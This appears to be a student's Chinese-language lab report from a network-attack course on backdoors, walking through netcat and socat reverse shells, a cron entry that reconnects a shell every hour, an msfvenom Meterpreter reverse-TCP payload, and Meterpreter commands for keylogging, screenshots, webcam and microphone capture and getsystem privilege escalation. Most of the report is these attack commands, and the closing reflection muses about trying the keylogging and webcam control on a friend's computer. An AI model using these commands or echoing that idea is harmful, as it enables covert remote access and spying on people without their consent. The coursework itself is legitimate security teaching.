20154319 《网络对抗技术》后门原理与实践

一、实验说明

  1. 任务一:使用netcat获取主机操作Shell,cron启动 (0.5分)

  2. 任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分)

  3. 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)

  4. 任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)

二、基础问题回答

1.问:例举你能想到的一个后门进入到你系统中的可能方式?

下载一些破解版的软件时,软件内部可能会有附带程序含有恶意代码;电子邮件内的链接藏有木马程序;链接公共WiFi是注入木马程序;u盘拷贝进电脑

2.问:例举你知道的后门如何启动起来(win及linux)的方式?

 win:通过“Windows->控制面板->管理工具->任务计划程序”,创建任务。

Linux:可以通过cron来启动;通过对正常软件的绑定注入shellcode。

3.问:Meterpreter有哪些给你映像深刻的功能?

截取击键记录和截图屏幕,感觉用电脑一直被监视。

4.问:如何发现自己有系统有没有被安装后门?

 

使用杀毒软件查看;定期检查进程管理器。

三、实验过程

任务一  使用netcat获取主机操作Shell,cron启动

一、Win获得Linux Shell

1.在Windows下使用指令,查看win主机IP为:192.168.199.187

ipconfig

 

 

 

 

2.windows调用ncat.exe程序打开监听,监听端口为4319

3.在Linux中使用nc指令的-e参数反弹连接win

nc #win主机ip# #端口# -e /bin/sh

4. windows下获得一个linux shell,可运行任何linux指令,如输入ls

二、 Linux获得Win Shell

1. 在Linux下使用指令查看linux主机IP为:192.168.199.132

ifconfig

2.Linux下使用nc指令运行监听

nc -l -p 端口号

3. 在windows中使用ncat.exe指令以及-e参数反弹连接Linux:

 

4. Linux下可看到Windows的命令提示,输入windows的 ipconfig命令成功查看到windows主机的IP:

##nc传输数据(以后可以用来聊天~我在8888端口等你(?_?))

1. windows打开端口4319

2.让Linux连接到4319端口

3.建立连接后传输数据,可实现互传

三、cron启动

1.Windows->控制面板->管理工具->任务计划程序,创建任务:

2.Linux上cron启动,在windows系统下监听4319端口:

键入指令

crotab –e  //-e 表示编辑,按a进入编辑界面

在最后一行添加

51 * * * * /bin/netcat 192.168.199.187 4319 –e /bin/sh  //表示每小时的第21分钟反弹连接win

第51分钟后可以输入指令,例如ls

 

任务二  使用socat获取主机操作Shell, 任务计划启动

socat下载地址[https://gitee.com/wildlinux/NetSec/attach_files]

因为之前没有下载,这部分是分开做的。

1.win主机ip:172.30.3.26

2.Linux主机ip:172.30.4.219

3. 在windows系统下,输入命令:

socat.exe tcp-listen:4319 exec:cmd,pty,stderr

这里要注意路径(可以直接将socat.exe拖到小黑框中)。

4.在Linux系统下,输入命令:

socat - tcp:  win主机ip

可以成功获得一个cmd shell,可以输入指令,例如ipconfig

任务三  使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell。

1.在Linux上输入指令,生成一个名称为4319.exe 后门可执行文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.132 LPORT=4319 -f exe >4319.exe

 

2.利用ncat传送文件到windows上,设置windows接收端口为4319,通过以下指令实现文件传输

nc -l 1234 > filename.out
nc host.example.com 1234 < filename.in

没有截图,没有截图,忘记了

3.在Linux下,MSF打开监听进程:(可爱的羊??)

msfconsole

4.查看并设置payload,LHOST和LPORT

第一行:进入handle模式;

第二行:设置payload;

第三行:查看当前信息状态。

第一行:设置LHOST为192.168.199.132

第二行:设置LPORT为4319

4.输入exploit命令,开始监听:

exploit

5.windows运行该后门文件

6.成功获取shell权限

任务四  使用MSF meterpreter获取截图、击键记录、获取管理员权限偷看登录密码

1.获取截图

使用screenshot命令抓图

 

2.获取击键记录

keyscan_start    //开始获取
keyscan_dump   //查看

3.使用摄像头进行拍照:

webcam_snap

 

4.截获一段音频

record_mic

5.获得管理员权限,使用ps命令获取登录密码

meterpreter > getsystem    //获得管理员权限
meterpreter > ps               //获取登录密码

 

四、实验中遇到的问题

1.已经解决的问题:第一次使用摄像头拍照的时候拍不了,原因是超时了,重新在win系统运行一下就行

2.还在纠结的问题:不知什么叫积极拒绝???

五、实验体会

这次实验感触很深,让我以后用电脑都有一种被监视的感觉。这次使用Meterpreter还是很有趣的,功能很多,其中击键记录、偷窥登录密码、控制摄像头等功能,觉得以后可以在朋友的电脑上试试,看起来很高级的样子,不过实际操作做起来还算是比较简单的。由于我的电脑本身就是Windows系统,就没有装Windows的虚拟机,直接在自己的电脑上做的时候,从Linux传4319.exe后门程序到电脑上好几次都直接消失了,被腾讯的电脑管家直接清理掉了,其实可以把后门程序设置在白名单里面就不用关闭杀毒软件了,说明这个后门软件还是很容易被杀毒软件发现并直接清理掉的,用在实验上还行,实际上可以成功的几率还是很低吧。

 

posted on 2018-03-28 23:27  154319张武璐  阅读(155)  评论(0编辑  收藏

导航